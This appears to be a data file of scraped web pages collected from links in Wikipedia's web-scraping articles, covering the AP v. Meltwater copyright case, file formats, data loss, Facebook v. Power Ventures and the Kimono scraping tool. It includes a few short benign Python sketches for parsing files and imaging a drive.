1 AP filed suit on 14 February 2012 on six forms of copyright infringement and hot news misappropriation, and Meltwater responded with four defense claims surrounding fair use and tortious interference with business relations. The pretrial was held 20 April 2012 and the right to initial investigation was granted. On 13 July 2012, AP added more articles to their complaint. On 9 November 2012, AP and Meltwater both filed for summary judgment, and the final motions were submitted 23 January 2013. The court decided on 21 March 2013. 1 AP asserted to the court that it held a valid copyright and Meltwater made use of the registered articles. Meltwater insisted that its use was fair. While there was no conversation or transacting with AP over Meltwater's use of their material, Meltwater claimed that their software service acted like a search engine, creating the justification for an implied license. Meltwater also accused AP of estoppel because they took insufficient measures to prevent Meltwater from proceeding with their text scraping business. 1 The court first established that the Associated Press owned a valid copyright for the articles in question and that Meltwater copied original elements of the articles. 1 Although federal copyright law does not cover the reporting of facts, the compilation of facts is protected (due to precedent set forth by Nihon Keizai Shimbun, Inc. v. Comline Business Data, Inc.). Therefore, the Associated Press owned a valid copyright over its news articles. Furthermore, Meltwater did not deny that it used automated crawlers to scrape the Associated Press's articles for its news aggregation services and programs. The opinion of the District Judge, Denise Cote, stated that Meltwater did violate AP's copyright by clipping and redistributing its articles without the appropriate licenses. 1 4 The court found that Meltwater failed to justify its fair use claim under 17 U.S.C. 107. Under 17 U.S.C. 107, Meltwater failed to satisfy the four criteria for a fair use defense: 1 The court also held that while other news services who delivered AP's stories licensed from AP, Meltwater did not license the content from the AP. Then, according to the court's holding, Meltwater did not have the right to an implied license as they claimed in court. For one, AP made licensing their articles their main point of cash flow, so to grant a license to a non-paying party did not fall under AP's business model. 1 Although Meltwater had vowed to appeal, both the Associated Press and Meltwater dismissed all claims and counterclaims in July 2013. After the litigation, the Associated Press and Meltwater partnered to develop new products whose aim would be to benefit both companies. 3 4 Associated Press v. Meltwater has provided legal solutions for the news industry to maintain their ability to license to news aggregators. 5 The news industry has claimed to have lost much revenue due to news aggregators that circumvent licensing fees. These news aggregators prevent a significant portion of the news industry's audience from viewing ads on the original content. However, other critics contest that the fair use defense could still be applied to news articles under different circumstances. 6 These other critics suggest that some news aggregators could provide a different function and promote public dialogue amongst news readers. 
Public Relations Consultants Association (PRCA) v The Newspaper Licensing Agency (NLA) was a 2011 case UK Supreme Court case decided in 2013, 7 essentially on the same issue (Meltwater's media clippings shown to clients online) and with the same defendant, Meltwater Group. The plaintiff differed, being a UK copyright collection society rather than AP, but upon parallel grounds. The case was decided by UK and European law rather than the fair use doctrine, as the latter is only a US legal principle. The UK case, initially decided by lower courts in favour of the NLA at the initial case and appeal, was overturned by the UK Supreme Court, who ruled Meltwater's activities legal, subject to certain questions referred to the European Court of Justice and intended to clarify matters of a cross-border nature. The rationale was that viewing of copyright works was not, and had never been, illegal in either the UK or European law, 7 : item 36 and Article 5.1 of the European Directive Directive 2001 29 EC (which covers "temporary copies" 7 : item 9, 11 ) permitted automated copying of a temporary nature for a lawful purpose. As mere viewing by Meltwater's clients was lawful under UK and EU law, the technical creation of cached copies to enable and facilitate this were also lawful. 7 : item 16 17 |
557 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:About | Wikipedia is a free online encyclopedia that anyone can edit, and millions already have. Wikipedia's purpose is to benefit readers by presenting information on all branches of knowledge. Hosted by the Wikimedia Foundation, it consists of freely editable content, whose articles also have numerous links to guide readers towards more information. Written collaboratively by largely anonymous volunteers known as Wikipedians, Wikipedia articles can be edited by anyone with Internet access, except in limited cases where editing is restricted to prevent disruption or vandalism. Since its creation on January 15, 2001, it has grown into the world's largest reference website, attracting over a billion visitors monthly. Wikipedia currently has more than sixty-three million articles in more than 300 languages, including 6,868,487 articles in English, with 113,813 active contributors in the past month. Wikipedia's fundamental principles are summarized in its five pillars. The Wikipedia community has developed many policies and guidelines, although editors do not need to be familiar with them before contributing. Anyone can edit Wikipedia's text, references, and images. What is written is more important than who writes it. The content must conform with Wikipedia's policies, including being verifiable by published sources. Editors' opinions, beliefs, personal experiences, unreviewed research, libelous material, and copyright violations will not remain. Wikipedia's software allows easy reversal of errors, and experienced editors watch and patrol bad edits. Wikipedia differs from printed references in important ways. It is continually created and updated, and encyclopedic articles on new events appear within minutes rather than months or years. Because anyone can improve Wikipedia, it has become more comprehensive than any other encyclopedia. Its contributors enhance its articles' quality and quantity, and remove misinformation, errors and vandalism. Any reader can fix a mistake or add more information to what has already been written (see Researching with Wikipedia). Begin by simply clicking the Edit or Edit source buttons or the pencil icon at the top of any non-protected page or section. Wikipedia has tested the wisdom of the crowd since 2001 and found that it succeeds. |
558 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File_format | A file format is a standard way that information is encoded for storage in a computer file. It specifies how bits are used to encode information in a digital storage medium. File formats may be either proprietary or free. Some file formats are designed for very particular types of data: PNG files, for example, store bitmapped images using lossless data compression. Other file formats, however, are designed for storage of several different types of data: the Ogg format can act as a container for different types of multimedia including any combination of audio and video, with or without text (such as subtitles), and metadata. A text file can contain any stream of characters, including possible control characters, and is encoded in one of various character encoding schemes. Some file formats, such as HTML, scalable vector graphics, and the source code of computer software are text files with defined syntaxes that allow them to be used for specific purposes. File formats often have a published specification describing the encoding method and enabling testing of program intended functionality. Not all formats have freely available specification documents, partly because some developers view their specification documents as trade secrets, and partly because other developers never author a formal specification document, letting precedent set by other already existing programs that use the format define the format via how these existing programs use it. If the developer of a format does not publish free specifications, another developer looking to utilize that kind of file must either reverse engineer the file to find out how to read it or acquire the specification document from the format's developers for a fee and by signing a non-disclosure agreement. The latter approach is possible only when a formal specification document exists. Both strategies require significant time, money, or both; therefore, file formats with publicly available specifications tend to be supported by more programs. Patent law, rather than copyright, is more often used to protect a file format. Although patents for file formats are not directly permitted under US law, some formats encode data using patented algorithms. For example, prior to 2004, using compression with the GIF file format required the use of a patented algorithm, and though the patent owner did not initially enforce their patent, they later began collecting royalty fees. This has resulted in a significant decrease in the use of GIFs, and is partly responsible for the development of the alternative PNG format. However, the GIF patent expired in the US in mid 2003, and worldwide in mid 2004. Different operating systems have traditionally taken different approaches to determining a particular file's format, with each approach having its own advantages and disadvantages. Most modern operating systems and individual applications need to use all of the following approaches to read "foreign" file formats, if not work with them completely. One popular method used by many operating systems, including Windows, macOS, CP M, DOS, VMS, and VM CMS, is to determine the format of a file based on the end of its name, more specifically the letters following the final period. This portion of the filename is known as the filename extension. For example, HTML documents are identified by names that end with .html (or .htm), and GIF images by .gif. 
In the original FAT file system, file names were limited to an eight-character identifier and a three-character extension, known as an 8.3 filename. There are a limited number of three-letter extensions, which can cause a given extension to be used by more than one program. Many formats still use three-character extensions even though modern operating systems and application programs no longer have this limitation. Since there is no standard list of extensions, more than one format can use the same extension, which can confuse both the operating system and users. One artifact of this approach is that the system can easily be tricked into treating a file as a different format simply by renaming it — an HTML file can, for instance, be easily treated as plain text by renaming it from filename.html to filename.txt. Although this strategy was useful to expert users who could easily understand and manipulate this information, it was often confusing to less technical users, who could accidentally make a file unusable (or "lose" it) by renaming it incorrectly. This led most versions of Windows and Mac OS to hide the extension when listing files. This prevents the user from accidentally changing the file type, and allows expert users to turn this feature off and display the extensions. Hiding the extension, however, can create the appearance of two or more identical filenames in the same folder. For example, a company logo may be needed both in .eps format (for publishing) and .png format (for web sites). With the extensions visible, these would appear as the unique filenames: "CompanyLogo.eps" and "CompanyLogo.png". On the other hand, hiding the extensions would make both appear as "CompanyLogo", which can lead to confusion. Hiding extensions can also pose a security risk. 1 For example, a malicious user could create an executable program with an innocent name such as "Holiday photo.jpg.exe". The .exe" would be hidden and an unsuspecting user would see "Holiday photo.jpg", which would appear to be a JPEG image, usually unable to harm the machine. However, the operating system would still see the .exe" extension and run the program, which would then be able to cause harm to the computer. The same is true with files with only one extension: as it is not shown to the user, no information about the file can be deduced without explicitly investigating the file. To further trick users, it is possible to store an icon inside the program, in which case some operating systems' icon assignment for the executable file (.exe) would be overridden with an icon commonly used to represent JPEG images, making the program look like an image. Extensions can also be spoofed: some Microsoft Word macro viruses create a Word file in template format and save it with a .doc extension. Since Word generally ignores extensions and looks at the format of the file, these would open as templates, execute, and spread the virus. citation needed This represents a practical problem for Windows systems where extension-hiding is turned on by default. A second way to identify a file format is to use information regarding the format stored inside the file itself, either information meant for this purpose or binary strings that happen to always be in specific locations in files of some formats. Since the easiest place to locate them is at the beginning, such area is usually called a file header when it is greater than a few bytes, or a magic number if it is just a few bytes long. 
The metadata contained in a file header are usually stored at the start of the file, but might be present in other areas too, often including the end, depending on the file format or the type of data contained. Character-based (text) files usually have character-based headers, whereas binary formats usually have binary headers, although this is not a rule. Text-based file headers usually take up more space, but being human-readable, they can easily be examined by using simple software such as a text editor or a hexadecimal editor. As well as identifying the file format, file headers may contain metadata about the file and its contents. For example, most image files store information about image format, size, resolution and color space, and optionally authoring information such as who made the image, when and where it was made, what camera model and photographic settings were used (Exif), and so on. Such metadata may be used by software reading or interpreting the file during the loading process and afterwards. File headers may be used by an operating system to quickly gather information about a file without loading it all into memory, but doing so uses more of a computer's resources than reading directly from the directory information. For instance, when a graphic file manager has to display the contents of a folder, it must read the headers of many files before it can display the appropriate icons, but these will be located in different places on the storage medium thus taking longer to access. A folder containing many files with complex metadata such as thumbnail information may require considerable time before it can be displayed. If a header is binary hard-coded such that the header itself needs complex interpretation in order to be recognized, especially for metadata content protection's sake, there is a risk that the file format can be misinterpreted. It may even have been badly written at the source. This can result in corrupt metadata which, in extremely bad cases, might even render the file unreadable. clarification needed A more complex example of file headers are those used for wrapper (or container) file formats. One way to incorporate file type metadata, often associated with Unix and its derivatives, is to store a "magic number" inside the file itself. Originally, this term was used for a specific set of 2 byte identifiers at the beginnings of files, but since any binary sequence can be regarded as a number, any feature of a file format which uniquely distinguishes it can be used for identification. GIF images, for instance, always begin with the ASCII representation of either GIF87a or GIF89a, depending upon the standard to which they adhere. Many file types, especially plain-text files, are harder to spot by this method. HTML files, for example, might begin with the string html (which is not case sensitive), or an appropriate document type definition that starts with DOCTYPE html, or, for XHTML, the XML identifier, which begins with ?xml. The files can also begin with HTML comments, random text, or several empty lines, but still be usable HTML. The magic number approach offers better guarantees that the format will be identified correctly, and can often determine more precise information about the file. 
Since reasonably reliable "magic number" tests can be fairly complex, and each file must effectively be tested against every possibility in the magic database, this approach is relatively inefficient, especially for displaying large lists of files (in contrast, file name and metadata-based methods need to check only one piece of data, and match it against a sorted index). Also, data must be read from the file itself, increasing latency as opposed to metadata stored in the directory. Where file types do not lend themselves to recognition in this way, the system must fall back to metadata. It is, however, the best way for a program to check if the file it has been told to process is of the correct format: while the file's name or metadata may be altered independently of its content, failing a well-designed magic number test is a pretty sure sign that the file is either corrupt or of the wrong type. On the other hand, a valid magic number does not guarantee that the file is not corrupt or is of a correct type. So-called shebang lines in script files are a special case of magic numbers. Here, the magic number is human-readable text that identifies a specific command interpreter and options to be passed to the command interpreter. Another operating system using magic numbers is AmigaOS, where magic numbers were called "Magic Cookies" and were adopted as a standard system to recognize executables in Hunk executable file format and also to let single programs, tools and utilities deal automatically with their saved data files, or any other kind of file types when saving and loading data. This system was then enhanced with the Amiga standard Datatype recognition system. Another method was the FourCC method, originating in OSType on Macintosh, later adapted by Interchange File Format (IFF) and derivatives. A final way of storing the format of a file is to explicitly store information about the format in the file system, rather than within the file itself. This approach keeps the metadata separate from both the main data and the name, but is also less portable than either filename extensions or "magic numbers", since the format has to be converted from filesystem to filesystem. While this is also true to an extent with filename extensions— for instance, for compatibility with MS-DOS's three character limit— most forms of storage have a roughly equivalent definition of a file's data and name, but may have varying or no representation of further metadata. Note that zip files or archive files solve the problem of handling metadata. A utility program collects multiple files together along with metadata about each file and the folders directories they came from all within one new file (e.g. a zip file with extension .zip). The new file is also compressed and possibly encrypted, but now is transmissible as a single file across operating systems by FTP transmissions or sent by email as an attachment. At the destination, the single file received has to be unzipped by a compatible utility to be useful. The problems of handling metadata are solved this way using zip files or archive files. The Mac OS' Hierarchical File System stores codes for creator and type as part of the directory entry for each file. These codes are referred to as OSTypes. These codes could be any 4 byte sequence but were often selected so that the ASCII representation formed a sequence of meaningful characters, such as an abbreviation of the application's name or the developer's initials. 
For instance a HyperCard "stack" file has a creator of WILD (from Hypercard's previous name, "WildCard") and a type of STAK. The BBEdit text editor has a creator code of R ch referring to its original programmer, Rich Siegel. The type code specifies the format of the file, while the creator code specifies the default program to open it with when double-clicked by the user. For example, the user could have several text files all with the type code of TEXT, but each open in a different program, due to having differing creator codes. This feature was intended so that, for example, human-readable plain-text files could be opened in a general-purpose text editor, while programming or HTML code files would open in a specialized editor or IDE. However, this feature was often the source of user confusion, as which program would launch when the files were double-clicked was often unpredictable. RISC OS uses a similar system, consisting of a 12 bit number which can be looked up in a table of descriptions—e.g. the hexadecimal number FF5 is "aliased" to PoScript, representing a PostScript file. A Uniform Type Identifier (UTI) is a method used in macOS for uniquely identifying "typed" classes of entities, such as file formats. It was developed by Apple as a replacement for OSType (type creator codes). The UTI is a Core Foundation string, which uses a reverse-DNS string. Some common and standard types use a domain called public (e.g. public.png for a Portable Network Graphics image), while other domains can be used for third-party types (e.g. com.adobe.pdf for Portable Document Format). UTIs can be defined within a hierarchical structure, known as a conformance hierarchy. Thus, public.png conforms to a supertype of public.image, which itself conforms to a supertype of public.data. A UTI can exist in multiple hierarchies, which provides great flexibility. In addition to file formats, UTIs can also be used for other entities which can exist in macOS, including: In IBM OS VS through z OS, the VSAM catalog (prior to ICF catalogs) and the VSAM Volume Record in the VSAM Volume Data Set (VVDS) (with ICF catalogs) identifies the type of VSAM dataset. In IBM OS 360 through z OS, a format 1 or 7 Data Set Control Block (DSCB) in the Volume Table of Contents (VTOC) identifies the Dataset Organization (DSORG) of the dataset described by it. The HPFS, FAT12, and FAT16 (but not FAT32) filesystems allow the storage of "extended attributes" with files. These comprise an arbitrary set of triplets with a name, a coded type for the value, and a value, where the names are unique and values can be up to 64 KB long. There are standardized meanings for certain types and names (under OS 2). One such is that the .TYPE" extended attribute is used to determine the file type. Its value comprises a list of one or more file types associated with the file, each of which is a string, such as "Plain Text" or "HTML document". Thus a file may have several types. The NTFS filesystem also allows storage of OS 2 extended attributes, as one of the file forks, but this feature is merely present to support the OS 2 subsystem (not present in XP), so the Win32 subsystem treats this information as an opaque block of data and does not use it. Instead, it relies on other file forks to store meta-information in Win32 specific formats. OS 2 extended attributes can still be read and written by Win32 programs, but the data must be entirely parsed by applications. 
On Unix and Unix-like systems, the ext2, ext3, ext4, ReiserFS version 3, XFS, JFS, FFS, and HFS filesystems allow the storage of extended attributes with files. These include an arbitrary list of "name value" strings, where the names are unique and a value can be accessed through its related name. The PRONOM Persistent Unique Identifier (PUID) is an extensible scheme of persistent, unique, and unambiguous identifiers for file formats, which has been developed by The National Archives of the UK as part of its PRONOM technical registry service. PUIDs can be expressed as Uniform Resource Identifiers using the info:pronom namespace. Although not yet widely used outside of the UK government and some digital preservation programs, the PUID scheme does provide greater granularity than most alternative schemes. MIME types are widely used in many Internet-related applications, and increasingly elsewhere, although their usage for on-disc type information is rare. These consist of a standardised system of identifiers (managed by IANA) consisting of a type and a sub-type, separated by a slash—for instance, text html or image gif. These were originally intended as a way of identifying what type of file was attached to an e-mail, independent of the source and target operating systems. MIME types identify files on BeOS, AmigaOS 4.0 and MorphOS, as well as store unique application signatures for application launching. In AmigaOS and MorphOS, the Mime type system works in parallel with Amiga specific Datatype system. There are problems with the MIME types though; several organizations and people have created their own MIME types without registering them properly with IANA, which makes the use of this standard awkward in some cases. File format identifiers are another, not widely used way to identify file formats according to their origin and their file category. It was created for the Description Explorer suite of software. It is composed of several digits of the form NNNNNNNNN-XX-YYYYYYY. The first part indicates the organization origin maintainer (this number represents a value in a company standards organization database), and the 2 following digits categorize the type of file in hexadecimal. The final part is composed of the usual filename extension of the file or the international standard number of the file, padded left with zeros. For example, the PNG file specification has the FFID of 000000001 31 0015948 where 31 indicates an image file, 0015948 is the standard number and 000000001 indicates the International Organization for Standardization (ISO). Another less popular way to identify the file format is to examine the file contents for distinguishable patterns among file types. The contents of a file are a sequence of bytes and a byte has 256 unique permutations (0 255). Thus, counting the occurrence of byte patterns that is often referred to as byte frequency distribution gives distinguishable patterns to identify file types. There are many content-based file type identification schemes that use a byte frequency distribution to build the representative models for file type and use any statistical and data mining techniques to identify file types. 2 There are several types of ways to structure data in a file. The most usual ones are described below. Earlier file formats used raw data formats that consisted of directly dumping the memory images of one or more structures into the file. This has several drawbacks. 
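The byte-frequency-distribution idea mentioned above lends itself to a short sketch: count how often each of the 256 byte values appears in a file and normalise the counts. The comparison against representative models for each file type is deliberately left out, since the text only describes it in general terms.

from collections import Counter

def byte_frequency_distribution(path):
    # Stream the file in chunks and count occurrences of each byte value.
    counts = Counter()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            counts.update(chunk)
    total = sum(counts.values()) or 1
    # 256-element vector of relative frequencies, one per possible byte value.
    return [counts.get(value, 0) / total for value in range(256)]

# A content-based identifier would compare this vector against stored models
# for known file types, e.g. with a distance metric or a trained classifier.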
Unless the memory images also have reserved spaces for future extensions, extending and improving this type of structured file is very difficult. It also creates files that might be specific to one platform or programming language (for example a structure containing a Pascal string is not recognized as such in C). On the other hand, developing tools for reading and writing these types of files is very simple. The limitations of the unstructured formats led to the development of other types of file formats that could be easily extended and be backward compatible at the same time. In this kind of file structure, each piece of data is embedded in a container that somehow identifies the data. The container's scope can be identified by start- and end-markers of some kind, by an explicit length field somewhere, or by fixed requirements of the file format's definition. Throughout the 1970s, many programs used formats of this general kind. For example, word-processors such as troff, Script, and Scribe, and database export files such as CSV. Electronic Arts and Commodore-Amiga also used this type of file format in 1985, with their IFF (Interchange File Format) file format. A container is sometimes called a "chunk", although "chunk" may also imply that each piece is small, and or that chunks do not contain other chunks; many formats do not impose those requirements. The information that identifies a particular "chunk" may be called many different things, often terms including "field name", "identifier", "label", or "tag". The identifiers are often human-readable, and classify parts of the data: for example, as a "surname", "address", "rectangle", "font name", etc. These are not the same thing as identifiers in the sense of a database key or serial number (although an identifier may well identify its associated data as such a key). With this type of file structure, tools that do not know certain chunk identifiers simply skip those that they do not understand. Depending on the actual meaning of the skipped data, this may or may not be useful (CSS explicitly defines such behavior). This concept has been used again and again by RIFF (Microsoft-IBM equivalent of IFF), PNG, JPEG storage, DER (Distinguished Encoding Rules) encoded streams and files (which were originally described in CCITT X.409:1984 and therefore predate IFF), and Structured Data Exchange Format (SDXF). Indeed, any data format must somehow identify the significance of its component parts, and embedded boundary-markers are an obvious way to do so: This is another extensible format, that closely resembles a file system (OLE Documents are actual filesystems), where the file is composed of 'directory entries' that contain the location of the data within the file itself as well as its signatures (and in certain cases its type). Good examples of these types of file structures are disk images, executables, OLE documents TIFF, libraries. Some file formats like ODT and DOCX, being PKZIP-based, are both chunked and carry a directory. citation needed The structure of a directory-based file format lends itself to modifications more easily than unstructured or chunk-based formats. citation needed The nature of this type of format allows users to carefully construct files that causes reader software to do things the authors of the format never intended to happen. An example of this is the zip bomb. 
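As a concrete example of a chunk-based format, the following sketch walks the chunk sequence of a PNG file, whose published layout is a 4-byte big-endian length, a 4-byte chunk identifier, the data, and a CRC; callers simply skip chunk identifiers they do not understand, exactly as described above. The example path is a placeholder.

import struct

def iter_png_chunks(path):
    with open(path, "rb") as f:
        if f.read(8) != b"\x89PNG\r\n\x1a\n":
            raise ValueError("not a PNG file")
        while True:
            header = f.read(8)
            if len(header) < 8:
                break
            length, chunk_type = struct.unpack(">I4s", header)
            data = f.read(length)
            f.read(4)  # CRC, not verified in this sketch
            yield chunk_type, data
            if chunk_type == b"IEND":
                break

# for chunk_type, data in iter_png_chunks("example.png"):
#     if chunk_type not in (b"IHDR", b"IDAT", b"IEND"):
#         continue  # skip chunks this reader does not understand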
Directory-based file formats also use values that point at other areas in the file. If a later value points back at data that was read earlier, any reader software that assumes the input file is valid and blindly follows these pointers can be trapped in an infinite loop. |
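A defensive reader can avoid that failure mode by remembering which offsets it has already visited. The sketch below assumes a hypothetical read_entry callback that returns the payload and the next offset for a directory entry; the record layout itself is made up for illustration.

def follow_directory(read_entry, start_offset):
    # `read_entry(offset)` is a hypothetical callback returning
    # (payload, next_offset); a next_offset of None ends the chain.
    seen = set()
    offset = start_offset
    while offset is not None:
        if offset in seen:
            raise ValueError("cycle detected at offset %d" % offset)
        seen.add(offset)
        payload, offset = read_entry(offset)
        yield payload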
559 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_loss | Data loss is an error condition in information systems in which information is destroyed by failures (like failed spindle motors or head crashes on hard drives) or neglect (like mishandling, careless handling or storage under unsuitable conditions) in storage, transmission, or processing. Information systems implement backup and disaster recovery equipment and processes to prevent data loss or restore lost data. 1 Data loss can also occur if the physical medium containing the data is lost or stolen. Data loss is distinguished from data unavailability, which may arise from a network outage. Although the two have substantially similar consequences for users, data unavailability is temporary, while data loss may be permanent. Data loss is also distinct from data breach, an incident where data falls into the wrong hands, although the term data loss has been used in those incidents. 2 Studies show hardware failure and human error are the two most common causes of data loss, accounting for roughly three quarters of all incidents. 3 Another cause of data loss is a natural disaster, which is a greater risk dependent on where the hardware is located. While the probability of data loss due to natural disaster is small, the only way to prepare for such an event is to store backup data in a separate physical location. As such, the best backup plans always include at least one copy being stored off-site. 4 The cost of a data loss event is directly related to the value of the data and the length of time that it is unavailable yet needed. For an enterprise in particular, the definition of cost extends beyond the financial and can also include time. Consider: The frequency of data loss and the impact can be greatly mitigated by taking proper precautions, those of which necessary can vary depending on the type of data loss. For example, multiple power circuits with battery backup and a generator only protect against power failures, though using an Uninterruptible Power Supply can protect drive against sudden power spikes. Similarly, using a journaling file system and RAID storage only protect against certain types of software and hardware failure. 5 For hard disk drives, which are a physical storage medium, ensuring minimal vibration and movement will help protect against damaging the components internally, as can maintaining a suitable drive temperature. 6 Regular data backups are an important asset to have when trying to recover after a data loss event, but they do not prevent user errors or system failures. As such, a data backup plan needs to be established and run in unison with a disaster recovery plan in order to lower risk. 7 Data recovery is often performed by specialized commercial services that have developed often proprietary methods to recover data from physically damaged media. Service costs at data recovery labs are usually dependent on type of damage and type of storage medium, as well as the required security or cleanroom procedures. File system corruption can frequently be repaired by the user or the system administrator. For example, a deleted file is typically not immediately overwritten on disk, but more often simply has its entry deleted from the file system index. In such a case, the deletion can be easily reversed. Successful recovery from data loss generally requires implementation of an effective backup strategy. 
Without an implemented backup strategy, recovery requires reinstallation of programs and regeneration of data. Even with an effective backup strategy, restoring a system to the precise state it was in prior to the Data Loss Event is extremely difficult. Some level of compromise between granularity of recoverability and cost is necessary. Furthermore, a Data Loss Event may not be immediately apparent. An effective backup strategy must also consider the cost of maintaining the ability to recover lost data for long periods of time. A highly effective backup system would have duplicate copies of every file and program that were immediately accessible whenever a Data Loss Event was noticed. However, in most situations, there is an inverse correlation between the value of a unit of data and the length of time it takes to notice the loss of that data. Taking this into consideration, many backup strategies decrease the granularity of restorability as the time increases since the potential Data Loss Event. By this logic, recovery from recent Data Loss Events is easier and more complete than recovery from Data Loss Events that happened further in the past. Recovery is also related to the type of Data Loss Event. Recovering a single lost file is substantially different from recovering an entire system that was destroyed in a disaster. An effective backup regimen has some proportionality between the magnitude of Data Loss and the magnitude of effort required to recover. For example, it should be far easier to restore the single lost file than to recover the entire system. If data loss occurs, a successful recovery must ensure that the deleted data is not over-written. For this reason write operations to the affected storage device should be avoided. This includes not starting the system to which the affected device is connected. This is because many operating systems create temporary files in order to boot, and these may overwrite areas of lost data — rendering it unrecoverable. Viewing web pages has the same effect — potentially overwriting lost files with the temporary HTML and image files created when viewing a web page. File operations such as copying, editing, or deleting should also be avoided. Upon realizing data loss has occurred, it is often best to shut down the computer and remove the drive in question from the unit. Re-attach this drive to a secondary computer with a write blocker device and then attempt to recover lost data. If possible, create an image of the drive in order to establish a secondary copy of the data. This can then be tested on, with recovery attempted, abolishing the risk of harming the source data. citation needed |
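The advice to image the affected drive before attempting recovery can be sketched as a block-by-block copy of the device file; the source and destination paths below are placeholders, and in practice a dedicated tool such as dd or ddrescue behind a hardware write blocker would normally be preferred.

def image_device(source="/dev/sdb", destination="evidence.img", block_size=1024 * 1024):
    # Copy the raw device to an image file so recovery tools can work on the
    # copy instead of the original, avoiding further writes to the source.
    with open(source, "rb") as src, open(destination, "wb") as dst:
        while True:
            block = src.read(block_size)
            if not block:
                break
            dst.write(block)

# image_device()  # requires read access to the device; paths are placeholders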
560 | https://en.wikipedia.org/wiki/Web_scraping | https://www.eff.org/cases/facebook-v-power-ventures | EFF has urged a San Francisco federal court and the Ninth Circuit Court of Appeals to dismiss Facebook's claims that criminal law is violated when its users opt for an add-on service that helps them aggregate their information from a variety of social networking sites. Power Ventures was a company that allowed users to login and manage all of their social networking accounts from one place. In 2008 Facebook sued the company, alleging it had violated the Computer Fraud and Abuse Act (CFAA) and the California state CFAA equivalent when it allowed users to access Facebook data after it blocked a specific IP address Power was using to connect to Facebook data. Facebook also claims that Power violated the CAN-SPAM Act, the federal law that prohibits sending commercial emails with materially misleading information, when Power encouraged users to invite their friends to try Power through Facebook's Events feature because the header information indicated the messages came from Facebook, not Power. In February 2012, the district court found Power liable under both claims and in September 2013, Power was ordered to pay more than $3 million in damages to Facebook. The case is now pending before the Ninth Circuit. EFF has argued that Facebook's interpretations of the law are dangerous to follow-on innovators and consumers and would criminalize widely accepted Internet behavior. Facebook claims that their role as guardian of users’ privacy gives them the power to shut down apps that give users more control over their own social media experience. Facebook is wrong. The latest example is their legal bullying of Friendly Social Browser.Friendly is a web browser with plugins geared... There’s a lot of legitimate concern these days about Internet giants and the lack of competition in the technology sector. It’s still easy and cheap to put up a website, build an app, or organize a group of people online, but a few large corporations have outsized power over the... Social media has a competition problem, and its name is Facebook. Today, Facebook and its subsidiaries are over ten times more valuable than the next two largest social media companies outside China—Twitter and Snapchat—combined. It has cemented its dominance by buying out potential competitors before they’ve had a chance to... For tech lawyers, one of the hottest questions this year is: can companies use the Computer Fraud and Abuse Act (CFAA)—an imprecise and outdated criminal anti “hacking” statute intended to target computer break-ins—to block their competitors from accessing publicly available information on their websites? The answer to this question has wide-ranging... Last weekend’s Cambridge Analytica news—that the company was able to access tens of millions of users’ data by paying low-wage workers on Amazon’s Mechanical Turk to take a Facebook survey, which gave Cambridge Analytica access to Facebook’s dossier on each of those turkers’ Facebook friends—has hammered home two problems: first,... Back to top Check out our 4 star rating on Charity Navigator. |
561 | https://en.wikipedia.org/wiki/Data_scraping | https://web.archive.org/web/20150511050542/http://www.wired.com/2014/03/kimono | Yes, the Apple Watch scratches all stainless steel watches do wrd.cm 1GUkGvK The number of web pages on the internet is somewhere north of two billion, perhaps as many as double that. It’s a huge amount of raw information. By comparison, there are only roughly 10,000 web APIs the virtual pipelines that let developers access, process, and repackage that data. In other words, to do anything new with the vast majority of the stuff on the web, you need to scrape it yourself. Even for the people who know how to do that, it’s tedious. Ryan Rowe and Pratap Ranade want to change that. For the last five months, Rowe and Ranade have been building out Kimono, a web app that lets you slurp data from any website and turn it instantly into an API. Using a bookmarklet, you highlight the parts of a site you want to scrape and Kimono does the rest. Those with programming chops can take the code Kimono spits out bake it into their own apps; for the code illiterate, Kimono will automatically rework scraped data into a dynamic chart, list, or a simple web app. In essence, it’s a point and click toolkit for taking apart the web, with the aim of letting people build new things with it. Excitement’s already bubbling around the potential. Kimono’s already raised money from big-name VCs like Ron Conway and its founders have had to turn down at least one offer for an early buy-out. The site’s already managing some 15,000 users and it’s still in beta. But for Rowe and Ranade, things are just getting started. The idea for Kimono was born out of Rowe’s time as a developer at the design consultancy Frog, where he continually ran into the same frustrating problem. A designer would have an idea that revolved around web stuff of one sort or another, but they’d have to find a developer before they could even get a sense of how the idea might actually work. “Getting the data just to prove if these apps would be interesting or not took a huge amount of time, which sucked, Rowe says. “You have these situations where designers and analysts really want to do stuff with data but have no means to get it, adds Ranade, whose most recent gig was at consulting firm McKinsey Company. “We realized that there doesn’t need to be that bottleneck. To laypeople who don’t already think of the web in terms of streams, sources, or APIs, it can be hard to grasp Kimono’s potential. But early adopters are already using it for a striking variety of projects. When they noticed there was no official API for the recent Sochi Olympics, Rowe and Ranade used Kimono to create one themselves. Devs and designers took it from there, building elegant medal-tracking apps, dynamic maps that visualize when and where Olympians were born, and more. Around the time the Kimono beta went live last month, Golan Levin, a pioneer of computational art and design, was introducing his students at Carnegie Mellon to the unglamorous first steps of any data viz project: acquiring, parsing, and cleaning data. He thought it’d be valuable to acquaint them with the process. While new tools like Temboo are making it easier than ever to work with official APIs for big-name sites, there traditionally haven’t been straightforward ways to get structured data off the majority of pages on the web. “Kimono came along and really changed that, Levin says. Levin himself is using Kimono to track real estate purchases in his home town of Pittsburgh. 
He also cited an upcoming meeting of civic-minded coders called the Pittsburgh Data Brigade, where he expected Kimono to see some use. “Pittsburgh’s information systems are so old and creaky that getting data out is really hard, he explains. It’s a problem many municipalities face; they’re eager to open up their data but lack the means to actually open it up. Kimono could help bridge that gap. Democratizing Data Scraping These use cases might sound esoteric, and in some senses, they are. But part of the ambition with Kimono is bringing data scraping to a wider audience. It’s about letting artists, historians, sociologists and more cull and combine content from various sources and present it in novel ways. As an example, Ranade brings up Malcolm Gladwell’s theory about elite hockey players and how their success might be explained by where their birthdays fall in relation to Canada’s little league cutoff dates. A successful author like Gladwell can presumably tap a research assistant to trawl Wikipedia and collect the relevant data. A grad student probably cannot. With Kimono, however, she could amass a list of Wikipedia URLs, point Kimono to the “date of birth” and “place of birth” fields, and let it corral the data for her. This sort of birthday little league cutoff connection isn’t going to be made by a random developer, Ranade posts, but rather by a person who has “domain knowledge” in that field. “They might not be a programmer, he says. “But if we gave a little bit of programming capability to that person, how could they look at the world in a different way? Looking at the World in a Different Way In the short term, Rowe and Ranade plan to make money by charging users depending on how many APIs they use and how frequently they update (right now the service is in beta, and anyone can make however many 